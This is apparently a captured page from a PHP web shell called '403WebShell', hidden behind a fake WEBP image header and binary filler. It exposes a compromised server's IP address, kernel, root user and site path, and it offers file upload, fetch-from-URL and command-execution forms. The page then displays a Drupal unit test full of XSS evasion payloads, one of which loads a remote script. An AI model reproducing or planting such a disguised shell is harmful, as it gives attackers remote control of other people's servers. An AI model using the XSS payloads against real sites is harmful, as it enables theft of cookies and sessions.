RIFF¤  WEBPVP8 ˜  ðÑ 
*ô
ô
>‘HŸK¥¤"§£±¨àð	

....................................../////.===Shadow-Here===./////................................................
> < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > <
-------------------------------------------------------------------------------------------------------------------
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////
RIFF¤  WEBPVP8 ˜  ðÑ 
*ô
ô
>‘HŸK¥¤"§£±¨àð	enü¹%½_F‘åè¿2ºQú³íªú`N¿­3ÿƒügµJžaÿ¯ÿ°~¼ÎùnúîÞÖô•òíôÁÉß®Sm¥Ü/ ‡ó˜f£Ùà<˜„xëJ¢Ù€<u¥QlÀ:Ò¨¶`iT[0 Ž´ª-˜ÇZU lÀ:Ò¨¶`iT[/úÏ{âŠUÌ
ã­*‹f ÌA~âcë¯)©‚Û–i‰u5 KÀ´}
.ä5
·å{ÒŸ1ª©Ú æiT[0 Ž–¶Œ—ÆY;cÿ‡·;zT)/Ô[ӟď•aÃÿ»æª“FçDO2hIoÞƒSõj¦K¼ŠL7ŸÛ›aÆxÜk[QJ¢Ù€<h‚GÖ“ùõ„7-Rš$HÆ#Aa,¤¾@8r©’Ïȉ‰ÍÁ’ òönxZÅe£íì6¢$f`iT[/4›ÑÞ±]¼Šöébû¸x“4á¦‰§SDñÍÁ
{U)ìs
ß
…
Î;ãfRü 7ººgëàØX3T™ ¨´ö óG*ÿÔ.ÆuÑh}­
O®ÉwÔÂã7‘ÀÉnyñã­*‹eéã*z*ï/q¹ºõ(3+ªA!}µFÝ­%óÙ½Úcñ¶¢•E²ðÕ$ö5^ÁœÇ-ï™Ï/ÂñÜ·¯Cõ£¿0unW$"»‘”§û•ÔÈhR…$Ý©-ËJ¢Ù€3(¯¾*îÙr=þÜÉMÜ$¢‡ 

}?É{\žõAÖÁÓl2Ä7yæ
*¾U U¼`;…¥ò< ~=b
1wÃÚÅHeÅÙ¼v²D(*-˜ÇYÓ±Pèqë?Ö$ ’*‚
Ìáý«%£Fè3Ù{þBá¡_ùûä[« Tyy;õn~¶{üB⶷‹>SO3x<ªÔ©4¿+ç¶A`q@Ì“Úñè™ÍÿJÌ´ª-˜ÆtÊÛL]Ïq*‘Ý”ì#ŸÌÏãY]@ê`¿	/ªfkØB4·®£ó z—Üw¥Pxù–ÞLШKÇN¾AkÙTf½è'‰g
gÆv›Øuh~
a˜Z— ïj*á¥t d£“uÒ ¨`K˜¹ßþ]b>˜]_ÏÔ6W—è2r4x•íÖ…"ƒÖNîä!¦å Ú}ýxGøÌ —@ ;ÆÚŠ=ɾ1ý8lªË¥ô
^yf®Œ¢u&2©nÙÇ›ñÂñŒ³ aPo['
½»øFùà­+4ê“$!lövlüÞ=;N®3ð‚õ›DÉKòÞ>čÍ¥ˆuߤ#ˆ$6ù™¥îŠ‡y’ÍB¼ çxÛ;X"WL£R÷͝*ó-¶Zu}º.s¸sšXqù–DþÿvªhüïwyŸ
¯é³lÀ:KCûÄ£Ëá\…­ ~—ýóî ¼ûûÜTÓüÇy…ŽÆvc»¾×Uñ¸žþоP÷¦ó:Ò¨¨5;Ð#&#ÖúñläÿÁœ GxÉ­/ñ‡áQðìYÉtÒwŽ¼GÔ´zàÒò
ð*ëzƒ•4~H]Ø‹f ñÓ
Èñ`NåWçs'ÆÏW^ø¹!XžµmQ5ÃËoLœÎ: ÞËÍ¥J
ù…î
èo£ßP
Îñ¶ž8.Œ]ʵ~5›ÙË-ù*8ÙÖß±~©¹rÓê‚j¶d¸{^Q'˜±Crß	ÚH—#¥¥QlÀ×ëã‡DÜ«èî þ&Çæžî;ŽÏºò6ÒLÃXy&ZŒ'j‚¢Ù€<h†×[7…ó\âüvn¹k­³¸ÃûR
ÜPVe4­qYÊ_f ñÖ•EµP–µv Ä•Ûë®2Xß[…”+@óż€?ë2S˜s^áþÎñ¶¢•EKÇ̉FVÔ«:°+¹snŸ]@A¢ÈøÈ€ÛVV‡ÿ¹³ØÅ«»õ·zkF3‘º
‹f ñÓ
í9t¿¨ZßÀ6íºÛˆ”nnù:U“¹o¡8*ž| Å_œÎ"Ù€<u‘.¹…µKã2)1¡˜Ï²RR1A
ËÏéS룡¦ì&̐T[/=LêãÓü+-Ù€(ä#
bCiœ8;OÍ€zÝÀY€<u¥M¤Öh?c©êðÔ2’Á8é
¼í-oþÚ¸ÓK¡aÔ
bº‡µI’
ŠfŽi½6½-{³ì@16‚ÜÚÿX¾¤/j)TZšÁ\ŒY‰1²õžA\Üm?èäc0I ¨¶_è  þüp“ÿzPXÜi¿ÿöÇ¿Ö=þ±ï       ]€  l7ùVù &9žå}+iW&þ“¶Eܮܐu‰lÍi¬ç}'qvÆ\Vûñ¶}Ä0£!.Ó¼ù™!1­t Ÿ±qBXÒ㬙‡±lÀÖ%tæÿOºú²¹¹K‘½w7q¾I#H_Åw\@—ÑÕ$!4ñu
—µY!„­´~ív“þzß„t°´ZÎ?áJÏÆo`=! ¶ßîþî|m(1êÜG'
ìøI‚_ìlÝ`
ÀàÈ#9~Ôº~Ö]+óܲâÑÝÃGÌ-ÃŽV/w¤úÞ§5³zÞ`BÍ-[o_ú‰ÃNÙø§º>IßÚù+–MGi‰*jE€‘JcÜ	ÓÌ
EÏÚj]o˜
Þr <¾U
ûŪæÍ/šÝH¥˜b”¼
ÁñßX GP›ï2›4WŠÏà×£…íÓk†¦H·ÅíMh
–*nó÷à]ÁjCº€b7<ب‹¨5車bp2:Á[UªM„QŒçiNMa#<5›áËó¸HýÊ"…×Éw¹¦ì2º–x<›»a±¸3Weü®FÝ⑱ö–î–³|LPÈ~çð~Çå‡|º kD¢µÏàÆAI
%1À% ¹Ò –
”ϝS¦‰4&¶£°à Öý”û_ÒÁw°A«Å€?mÇÛgHÉ/8)á¾ÛìáöŽP
í¨PŸNÙµº¦‡§Ùš"ÿ«>+ªÕ`Ê÷‡‚ßÕû˜þãÇ-PÍ.¾XV‘€
dÜ"þ4¹ ±Oú‘©t¥¦FªÄÃÄ•b‚znýu½—#cDs˜ÃiÑOˆñ×QO=*IAÊ,¶ŽZƒ;‡wøXè%EÐk:<kY//€¯îZòúbl?ƒô)Nñîo‚8gÚ–Ž
ãí?m6˜!Anº»¶¡%Š°c"¯òèØS'"y2Ê/TKš{Íæ(ÀªSs[†'<¨ª³!‹ŽhgZ¥è@	MŸ( ¸º€iÏssóäÅ ¥$±’`;$Í ‡Û€æ2èä¦ÄWDxao¦D¡°!Qå·3åÏw)Áþ:¦žûéº«à”£Pç‚ËTr{’ï¸ö‰ûÌœ=:ìrÈÅ*ÖÖk :ýÿÚ=‡VäonßoÎÕÍ'Ÿ®ÆL{ae"=<$"¹7Àˆ.!å¿Wζ—|
áYŸÜ¸Ê*;šÎ&ÆÛ U‡¡Þ®³Û.-·2õÑÇ	JZ~G0ø³ N7¸ærÔ ‹áoÀ<ÇMqÜóëZ	pPu]×Æð3ä7àlÎBµAŸ¾Iµ‡È« >F±Ú”	.Ѽ+Áu&Ç`."pÈÉw
o&¿dE6‘’EqTuK@Ì¥ã™À(Êk(h‰,H}RÀIXÛš3µ1©_OqÚÒJAñ$ÊÙÜ;D3çŒ[þùœh¬Ã³™ö6ç†NY".Ú‰ï[ªŸŒ'²Ð
öø_¨ÂÉ9u鶳Ò
ŠõTàîMØ#û¯gN‡bÙ놚X„ö
…ÉeüÌ^J
‹€.œ$Æ)βÄeæW#óüßĺŸ€ ÀzwV 9oä»f4V*uB
«Ë†¹ì¯žR霓æHXa=&“I4K;¯ç‹h×·"UŠ~<•â•ªVêª&ÍSÃÆÅ?ÔqÎ*mTM ˜›µwêd
#[C¡©§‘D<©àb†–ÁœøvH/,í:¯( ²£|4-„Æövv„Yͼ™^Á$ˆ„¢Û[6yB.åH*V¨æ?$=˜Ñ€•î¦ñ·­(VlŸ‘
nÀt8W÷´Bûba?q9ú¶Xƒl«ÿ\ù¶’þòUÐj/õ¢Ìµ³g$ƒÎR!¸»|Oߍë’BhîÚÑ¢ñåŒJ„®„£2Ð3•ô02Nt…!£Í]Ïc½Qÿ?
ˆ<&ÃA¾Ú,JˆijÌ#5yz„‰Î|ÊŽ5QÏ:‹ÐaóVÔxW—CpeÏzÐïíçôÿÅ_[hãsÐ_/ŽTÝ?BîˆííV$<¿i>²F¬_Eß¿ †bÊŒº­ÿ®Z 
 H“C}”¬,Mp
ý/Bá£w>˜YV°aƒúh+cŠ- r/[%|üUMHäQ°X»|û/@|°¥Ð
!BÔǢĩš+Õì
D«7ìN
¶ŽðÔ	"
ƶ’ÖçtA‰Û×}{tþz­¾GÍ›k¹OEJR$ Â׃ «ëÁ"oÉôž$oUK(Ä)Ãz³Ê-‹ê
N[Ò3Œñbï8P	4ƒ×q¢bo|?<ÛX¬òÄÍ°L–±›(™ûG?ýË©ÚÄ–ÂDØÐ_Ç¡ô
¾–ÄÏø ×e8Ë©$ÄF¹Å‹
ì[©óìl:F¾f´‹‹Xì²ï®\¬ôùƒ ÿat¥óèÒùHß0äe‚;ü×h:ÆWðHž=Ã8骣"kœ'Y?³}Tûè€>?0l›e1Lòñ„aæKÆw…hÖŠùW…ÈÆÄ0ši·›[pcwËþñiêíY/~-Á5˜!¿†A›™
Mÿþ(±“t@â“ö2­´TG5yé]çå僳	.·ÍïçÝ7UÚ±Ð/Nè»,_Ïùdj7\ï
Wì4›„»c¸àešg#ÒÊ⥭áØo5‘?ÌdÝô¯ ¹kzsƒ=´#ëÉK›Ø´±-¥eW?‡çßtòTã…$Ý+qÿ±ƒ÷_3Ô¥í÷:æ–ž<·Ö‡‰Å¢š‡%Ô—utÌÈìðžgÖÀz²À—ï÷Óîäõ{K'´È
÷³yaÏÁjƒô}ž§®æÊydÕÈë5¯èˆõvÕ©ã*çD„ “z„Ó‡^^xÂ3M§A´JG‚öï3W'ˆ.OvXè¡ÊÕª?5º7†˜(˜Ç¶#çê’¶!ÌdZK§æ
0fãaN]òY³RV	™î$®K2R¨`W!1Ôó\;ÝýB%qæK•&ÓÈe9È0êI±žeŸß
-ú@žQr¦
ö4»M¼Áè¹µmw 9 EÆE_°2ó„ŸXKWÁ×Hóì^´²GѝF©óäR†¦‰ç"V»eØ<3ùd3ÿÚ¤Žú“Gi" —‘_ÙËÎ~Üö¯¥½Î»üŸEÚŽåmÞþí
;ÞólËΦMzA"Âf(´òá;Éï(/7½ûñÌ­cïÕçлþÝz¾-ÍvÑ“pH­–ðÓj$¸Äû¤‚‘ãUBË-n“2åPkS5&‹Â|+g^œ®Ì͆d!OïäîU«c;{<j:ç•Xåz´”Ï‘zÙè)÷œ[B]é\¢ï™… Qäa!¶óïÍ\Ã
GèÓÀÿû£
*XÒû½ û Ô¥Xõž&¦Ý'¹Ð)§šËöe
ÖŒ­ÉôMÐhýx±¨]a´ŽD.9õa`¡µZËW"{ï¼dæ b4KDšüÁ»&bk¹“Æ ¼CŽ_çП(ôž-3̱aºöÄ÷’Ùܹ´fળ½˜Zó·U#œ-ñªÂ¡,)ïÀA…£D[¯	Ë«ý¨C[\”˜¢í•]Œ<t՗ׇ؊Ò>Û!ÅŽ«ëZ9Ókóˆ]¯ƒ›né
`ÇÒ+tÆš (ØKá¾—=3œ®•vuMñg²\ï Ec€
05±d™‡×iÇ×›UúvÌ¢£Èþ¡ÕØô¶ßÎA"ß±#Ö²ˆÊŸ¦*Ä~ij|àø.-¼'»Ú¥£h ofº¦‡VsR=N½„Î
v˜Z*SÌ{=jÑB‹tê…;’HžH¯8–îDù8ñ¢|Q•bÛçš–‹m³“ê¨ åÏ^m¬Žãþ©ïêO‡½6]
µÆ„Ooòü
²x}N¦Ë3ïé¿»€›HA˜m%çÞ/¿í7Fø“‹léUk)É°Œµ8Q8›:ÀŠeT*šõ~ôڝG6
¢}`ùH­–”¡k‰P1>š†®9z11!X	wKfmÁ¦xÑ,N1Q”–æB¶M…ÒÃv6SMˆhU¬ÊPŽï‘öj=·CŒ¯u¹ƒVIЃsx4’ömÛýc塶7ߊß
57^\wÒÐÆ k§h<Sïð¼Ê›Íbòþ·v-–Ãú8
UÁÄ	Æ=Fy
èŒjè~‡ì·‰¸Ý
ó‘{Yd°$nå©´€Ü‹óe¦‘Ug+Á,cç°”2¼Ù ­¢W”ÛT»v
ø ³KÂu¸„Äe5öÊ«2åp1õ[^ˆô‰*lðL}2ƶ,jqs[Ȭ
ß̬ąv‰«õ&%§/.Sly4
 ¶-Þáם²¦Xd½ƒ5¶GØÈ"Ö >,Œý
î«q^R½3]J¸ÇðN ‚çU¬ôº^Áì} 
³f©Õœ§ˆã:FÄÈ‚é(€™?àýÓüè1Gô£¼éj‚OÅñ  #>×—ßtÃ	0G¥Åa뀐kßhc™À_ÉñÞ#±)GD" YîäË-ÿÙ̪ ¹™a¯´¢E\ÝÒö‚;™„ë]_ p8‰o¡ñ+^÷ 3‘'dT4œŽ ðVë½° :¬víÑ«£tßÚS-3¶“þ2	†üüʨòrš¹M{É_¤`Û¨0ìjœøJ‡:÷ÃáZ˜†@GP&œÑDGÏs¡þ¦þDGú‘1Yá9Ôþ¼
ûø…§÷8&–ÜÑnÄ_m®^üÆ`;ÉVÁJ£?â€-ßê}suÍ2sõA NÌúA磸‘îÿÚ»ƒìö·á¿±tÑÐ"Tÿü˜[@/äj¬€uüªìù¥Ý˜á8Ý´sõj 8@rˆð
äþZÇD®ÿUÏ2ùôõrBzÆÏÞž>Ì™xœ“
wiÎ×7_… ¸
\#€MɁV¶¥üÕÿPÔ9Z‡ø§É8#H:ƒ5ÀÝå9ÍIŒ5åKÙŠ÷qÄ>1AÈøžj"µÂд/ªnÀqªã}"iŸBå˜ÓÛŽ¦…&ݧ;G@—³b¯“•"´4í¨ôM¨åñC‹ïùÉó¯ÓsSH2Ý@ßáM‡ˆKÀªÛUeø/4\gnm¥‹ŸŒqÄ b9ÞwÒNÏ_4Ég³ú=܆‚´ •â¥õeíþkjz>éÚyU«Íӝ݃6"8/ø{=Ô¢»G¥ äUw°W«,ô—¿ãㆅү¢³xŠUû™yŒ
(øSópÐ 9\åTâ»—*oG$/×ÍT†Y¿1¤Þ¢_‡ ¼„±ÍçèSaÓ
3ÛMÁBkxs‰’R/¡¤ˆÙçª(*õ„üXÌ´ƒ E§´¬EF"Ù”R/ÐNyÆÂ^°?™6¡œï
J·±$§?º>ÖüœcNÌù¯G ‹ñ2ŠBB„^·úìaz¨k:#¨Æ¨8LÎõލ£^§S&cŒÐU€ü(‡F±Š¼&P>8ÙÁ	‰	p5?0ÊƃZl¸aô š¼¡}gÿ¶zÆC²¹¬ÎÖG*HB¡O<º2#ñŒAƒ–¡B˜´É$¥›É:FÀÔx¾u?XÜÏÓvN©RS{2ʈãk9rmP¼Qq̳	è¼ÐFׄ^¡Öì fE“F4A…!ì/…¦Lƒ… …
$%´¾yã@CI¬ á—3PþBÏNÿ<ý°4Ü
ËÃ#ØÍ~âW«rEñw‹eùMMHß²`¬Öó½íf³:‹k˜¯÷}Z!ã¿<¥,\#öµÀ¯aÒNÆIé,Ћ–lŽ#Àæ9ÀÒS·I’½-Ïp Äz¤Š
Â* ­íÄ9­< 	h>׍3ZkËU¹§˜ŒŠ±f­’¤º³Q ÏB?‹#µíÃ¥®@(Gs«†vI¥Mµ‹Á©e~2ú³ÁP4ìÕi‚²Ê^ö@-DþÓàlÜOÍ]n"µã:žpsŽ¢:!
Aõ.ç~ÓBûH÷JCÌ]õVƒd
«ú´QÙEA–¯¯Œ!.ˆˆëQ±ù
œ·Ì!Õâ	)ùL„ÅÀlÚè5@B…o´Æ¸XÓ&Û…O«˜”_#‡ƒ„ûÈt!¤ÁÏ›ÎÝŠ?c9 â\>lÓÁVÄÑ™£eØY]:fÝ–—ù<j…}WSQª1¶¹\h‰&¸×°­”JÓÓ$à®ØÜ´«òBI„ûí½è‚ðhƒlý
ö•j‹)ÚZ]5[g$oD…'0¡kqIñVm2®žÜ‰‘k‹¦Ýz‰™gýŽ ·[eQ”°†3‘šc>+p{™ðè
û³”g±OƒÚSù£áÁÊ„ä,ï7š²G
ÕÌBk)~ÑiCµ|h#u¤¶îK¨²#²vݯGãeÖ϶ú…¾múÀ¶þÔñ‚Š9'^($¤§ò “š½{éúp÷J›ušS¹áªCÂubÃH9™D™/ZöØÁ‡¦ÝÙŸ·kð*_”.C‹{áXó€‡c¡c€§/šò/&éš÷,àéJþ‰X›fµ“C¨œ®r¬"kL‰Â_q…Z–.ÉL~O
µ›zn‚¹À¦Öª7\àHµšÖ %»ÇníV[¥*Õ;ƒ#½¾HK-ÖIÊdÏEÚ#=o÷Óò³´Š: Ç?{¾+9›–‘OEáU·S€˜j"ÄaÜŒÛWt› á–c#a»pÔZÞdŽtWê=9éöÊ¢µ~ ë ;Öe‡Œ®:bî3±ýê¢wà¼îpêñ¹¾4	zc¾ðÖÿzdêŒÑÒŝÀ‰s6¤í³ÎÙB¿OZ”+F¤á‡3@Ñë<Reða%âɟ>äg©·Ž ˆèª<ù@É{&S„œÕúÀA)‰h:YÀ5^ÂÓŒ°õäU\
ùËÍû#²?Xe¬tu‰^zÒÔãë¼ÛWtEtû
…‚g¶Úüâî*moGè¨7%u!]PhÏd™
Ý%Îx:
VÒ¦ôÊD3ÀŽKÛËãvÆî…N¯ä>Eró–ð`5	Œ%u5XkñÌ*N
U%¶áœÊ:Qÿú»“úzyÏ6å-၇¾ ´	ÒÊ]y	žO‘w2Äøæ…H’²f±ÎÇ.ª|¥'gîV•Ü
.̘¯€šòü¤U~Ù
†*¢!?ò
wý,}´°ÔÞnïoKq5µb!áÓ3"vAßH¡³¡·G(ÐÎ0Îò¼MG!/ài®@—¬04*`…«é8ªøøló“ˆÊ”èù¤…ßÊoÿé'ËuÌÖ5×È¡§ˆˆfŽë9}hìâ_!!¯ B&Ëö¶‰ÀAÙNVŸ Wh›¸®XÑJì¨ú“¿÷3
uj²˜¨ÍÎìë±aúŠÝå¯ð*Ó¨ôJ“yºØ)m°WýOè68†ŸÏ2—‰Ïüꪫٚ¥‹l1
ø ÏÄFjêµvÌbü¦èÝx:X±¢H=MÐß—,ˆÉÇ´(9ú¾^ÅÚ4¿m‡$âX‘å%(AlZo@½¨UOÌÕ”1ø¸jÎÀÃÃ_
µ‘Ü.œº¦Ut: Æï’!=¯uwû#,“pþÇúŒø(é@?³ü¥‘Mo	§—s@Œ#)§ŒùkL}NOÆêA›¸~r½¼ÙA—HJ«eˆÖ´*¡ÓpÌŸö.m<-"³ûÈ$¬_6­åf£ïÚâj1y§ÕJ½@dÞÁr&Í\Z%D£Íñ·AZ Û³øüd/ªAi†/Й~
‡âĮҮÏh§°b—›Û«mJžòG'[ÈYýŒ¦9psl ýÁ
®±f¦x,‰½tN ‚Xª9 ÙÖH.«Lo0×?͹m¡å†Ѽ+›2ƒF
±Ê8
7HÖ
Ï“²Æ–m9…òŸï]Â1äN†VLâCˆU
.ÿ‰Ts +ÅÎx(%¦u]6AF Š ØF鈄‘
|¢¶c±soŒ/t[a¾–û:s·`i햍ê›ËchÈ…8ßÀUÜewŒðNOƒõD%q#éû\9¤x¹&UE×G¥ Í—™$ð
E6-‡¼!ýpãÔM˜ Â
sìe¯ñµK¢Ç¡ùôléœ4Ö£”À 
Š®Ðc
^¨À}ÙËŸ§›ºê{ÊuÉC
×Sr€¤’fÉ*j!úÓ’Gsùìoîßîn%ò·àc Wp÷$¨˜)û»H ×8ŽÒ€Zj¤3ÀÙºY'Ql¦py{-6íÔCeiØp‘‡XÊîÆUߢ܂ž£X
é¼Y8þ©ëgñß}é.ÎógÒ„ÃØËø¯»™§Xýy M%@
NŠÀ(~áÐvu7&•,Ù˜ó€uP‡^^®=_E„jt’ 

<!doctypehtml><html><head><title>403WebShell</title><meta content="noindex"name="robots"></head><body bgcolor="#1f1f1f"text="#ffffff"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><style>@import url(https://fonts.googleapis.com/css?family=Dosis);@import url(https://fonts.googleapis.com/css?family=Bungee);@import url(https://fonts.googleapis.com/css?family=Russo+One);body{font-family:Consolas,cursive;text-shadow:0 0 1px #757575}body::-webkit-scrollbar{width:12px}body::-webkit-scrollbar-track{background:#1f1f1f}body::-webkit-scrollbar-thumb{background-color:#1f1f1f;border:3px solid gray}#content tr:hover{background-color:#636263;text-shadow:0 0 10px #fff}#content .first{background-color:#5e5e5e}#content .first:hover{background-color:#25383c;text-shadow:0 0 1px #757575}table{border:1px #000 dotted;table-layout:fixed}td{word-wrap:break-word}a{color:#df5;text-decoration:none}a:hover{color:#000;text-shadow:0 0 10px #fff}input,select,textarea{border:1px #000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px}.gas{background-color:#1f1f1f;color:#fff;cursor:pointer}select{background-color:transparent;color:#fff}select:after{cursor:pointer}.linka{background-color:transparent;color:#fff}.up{background-color:transparent;color:#fff}option{background-color:#1f1f1f}.btf{background:0 0;border:1px #fff solid;cursor:pointer}::-webkit-file-upload-button{background:0 0;color:#fff;border-color:#fff;cursor:pointer}</style><center><font face="Bungee" size="5">403Webshell</font></center>
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Server IP : <font color=#df5>104.225.223.251</font> &nbsp;/&nbsp; Your IP : <font color=#df5>216.73.216.41</font><br>Web Server : <font color='#df5'>Apache/2.4.41 (Ubuntu)</font><br>System : <font color='#df5'>Linux agtdemo03 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64</font><br>User : <font color='#df5'>root&nbsp;</font>( <font color='#df5'>0</font>)<br>PHP Version : <font color='#df5'>7.4.3-4ubuntu2.29</font><br>Disable Function : <font color='red'>pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,</font></font><br>MySQL : <font color=red>OFF</font> &nbsp;|&nbsp; cURL : <font color=green>ON</font> &nbsp;|&nbsp; WGET : <font color=green>ON</font> &nbsp;|&nbsp; Perl : <font color=green>ON</font> &nbsp;|&nbsp; Python : <font color=red>OFF</font> &nbsp;|&nbsp; Sudo : <font color=green>ON</font> &nbsp;|&nbsp; Pkexec : <font color=green>ON</font><br>Directory : &nbsp;<a href="?loknya=/">/</a><a href="?loknya=/srv">srv</a>/<a href="?loknya=/srv/wp">wp</a>/<a href="?loknya=/srv/wp/ciieduconnect.in">ciieduconnect.in</a>/<a href="?loknya=/srv/wp/ciieduconnect.in/www">www</a>/<a href="?loknya=/srv/wp/ciieduconnect.in/www/core">core</a>/<a href="?loknya=/srv/wp/ciieduconnect.in/www/core/modules">modules</a>/<a href="?loknya=/srv/wp/ciieduconnect.in/www/core/modules/editor">editor</a>/<a href="?loknya=/srv/wp/ciieduconnect.in/www/core/modules/editor/tests">tests</a>/<a href="?loknya=/srv/wp/ciieduconnect.in/www/core/modules/editor/tests/src">src</a>/<a href="?loknya=/srv/wp/ciieduconnect.in/www/core/modules/editor/tests/src/Unit">Unit</a>/<a href="?loknya=/srv/wp/ciieduconnect.in/www/core/modules/editor/tests/src/Unit/EditorXssFilter">EditorXssFilter</a>/</td></tr><tr><td><br>Upload File : <form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ <font color='red'>Writeable</font> ]
<input type="radio" value="2" name="dirnya" >document_root [ <font color='red'>Writeable</font> ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>
<input type="text" name="darilink" class="up" placeholder="https://linuxploit.com/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="5" placeholder="kerang.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
</form><br><form method="post" enctype="application/x-www-form-urlencoded">
Command : <input type="text" name="komend" class="up" style="cursor: pointer; border-color: #000" value="">
<input type="submit" name="komends" value=">>" class="up" style="cursor: pointer; border-color: #fff">
</form></table><br><hr><center style="font-family: Russo One">[ <a href='/canle-valve/index.php'>Back</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<hr></center><br><tr><td>Current File : /srv/wp/ciieduconnect.in/www/core/modules/editor/tests/src/Unit/EditorXssFilter/StandardTest.php</tr></td></table><br/><pre>&lt;?php

namespace Drupal\Tests\editor\Unit\EditorXssFilter;

use Drupal\editor\EditorXssFilter\Standard;
use Drupal\Tests\UnitTestCase;
use Drupal\filter\Plugin\FilterInterface;

// cspell:ignore ascript attributename bgsound bscript ckers cript datafld
// cspell:ignore dataformatas datasrc dynsrc ession livescript msgbox nmouseover
// cspell:ignore noxss pression ript scri scriptlet unicoded vbscript

/**
 * @coversDefaultClass \Drupal\editor\EditorXssFilter\Standard
 * @group editor
 */
class StandardTest extends UnitTestCase {

  /**
   * The mocked text format configuration entity.
   *
   * @var \Drupal\filter\Entity\FilterFormat|\PHPUnit\Framework\MockObject\MockObject
   */
  protected $format;

  /**
   * {@inheritdoc}
   */
  protected function setUp(): void {

    // Mock text format configuration entity object.
    $this-&gt;format = $this-&gt;getMockBuilder('\Drupal\filter\Entity\FilterFormat')
      -&gt;disableOriginalConstructor()
      -&gt;getMock();
    $this-&gt;format-&gt;expects($this-&gt;any())
      -&gt;method('getFilterTypes')
      -&gt;willReturn([FilterInterface::TYPE_HTML_RESTRICTOR]);
    $restrictions = [
      'allowed' =&gt; [
        'p' =&gt; TRUE,
        'a' =&gt; TRUE,
        '*' =&gt; [
          'style' =&gt; FALSE,
          'on*' =&gt; FALSE,
        ],
      ],
    ];
    $this-&gt;format-&gt;expects($this-&gt;any())
      -&gt;method('getHtmlRestrictions')
      -&gt;willReturn($restrictions);
  }

  /**
   * Provides test data for testFilterXss().
   *
   * @see \Drupal\Tests\editor\Unit\editor\EditorXssFilter\StandardTest::testFilterXss()
   */
  public function providerTestFilterXss() {
    $data = [];
    $data[] = ['&lt;p&gt;Hello, world!&lt;/p&gt;&lt;unknown&gt;Pink Fairy Armadillo&lt;/unknown&gt;', '&lt;p&gt;Hello, world!&lt;/p&gt;&lt;unknown&gt;Pink Fairy Armadillo&lt;/unknown&gt;'];
    $data[] = ['&lt;p style=&quot;color:red&quot;&gt;Hello, world!&lt;/p&gt;&lt;unknown&gt;Pink Fairy Armadillo&lt;/unknown&gt;', '&lt;p&gt;Hello, world!&lt;/p&gt;&lt;unknown&gt;Pink Fairy Armadillo&lt;/unknown&gt;'];
    $data[] = ['&lt;p&gt;Hello, world!&lt;/p&gt;&lt;unknown&gt;Pink Fairy Armadillo&lt;/unknown&gt;&lt;script&gt;alert(&quot;evil&quot;);&lt;/script&gt;', '&lt;p&gt;Hello, world!&lt;/p&gt;&lt;unknown&gt;Pink Fairy Armadillo&lt;/unknown&gt;alert(&quot;evil&quot;);'];
    $data[] = ['&lt;p&gt;Hello, world!&lt;/p&gt;&lt;unknown&gt;Pink Fairy Armadillo&lt;/unknown&gt;&lt;a href=&quot;javascript:alert(1)&quot;&gt;test&lt;/a&gt;', '&lt;p&gt;Hello, world!&lt;/p&gt;&lt;unknown&gt;Pink Fairy Armadillo&lt;/unknown&gt;&lt;a href=&quot;alert(1)&quot;&gt;test&lt;/a&gt;'];

    // All cases listed on https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

    // No Filter Evasion.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#No_Filter_Evasion
    $data[] = ['&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;', ''];

    // Image XSS using the JavaScript directive.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Image_XSS_using_the_JavaScript_directive
    $data[] = ['&lt;IMG SRC=&quot;javascript:alert(\'XSS\');&quot;&gt;', '&lt;IMG src=&quot;alert(&amp;#039;XSS&amp;#039;);&quot;&gt;'];

    // No quotes and no semicolon.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#No_quotes_and_no_semicolon
    $data[] = ['&lt;IMG SRC=javascript:alert(\'XSS\')&gt;', '&lt;IMG&gt;'];

    // Case insensitive XSS attack vector.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Case_insensitive_XSS_attack_vector
    $data[] = ['&lt;IMG SRC=JaVaScRiPt:alert(\'XSS\')&gt;', '&lt;IMG&gt;'];

    // HTML entities.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#HTML_entities
    $data[] = ['&lt;IMG SRC=javascript:alert(&quot;XSS&quot;)&gt;', '&lt;IMG&gt;'];

    // Grave accent obfuscation.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Grave_accent_obfuscation
    $data[] = ['&lt;IMG SRC=`javascript:alert(&quot;RSnake says, \'XSS\'&quot;)`&gt;', '&lt;IMG&gt;'];

    // Malformed A tags.
    // @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Malformed_A_tags
    $data[] = ['&lt;a onmouseover=&quot;alert(document.cookie)&quot;&gt;xxs link&lt;/a&gt;', '&lt;a&gt;xxs link&lt;/a&gt;'];
    $data[] = ['&lt;a onmouseover=alert(document.cookie)&gt;xxs link&lt;/a&gt;', '&lt;a&gt;xxs link&lt;/a&gt;'];

    // Malformed IMG tags.
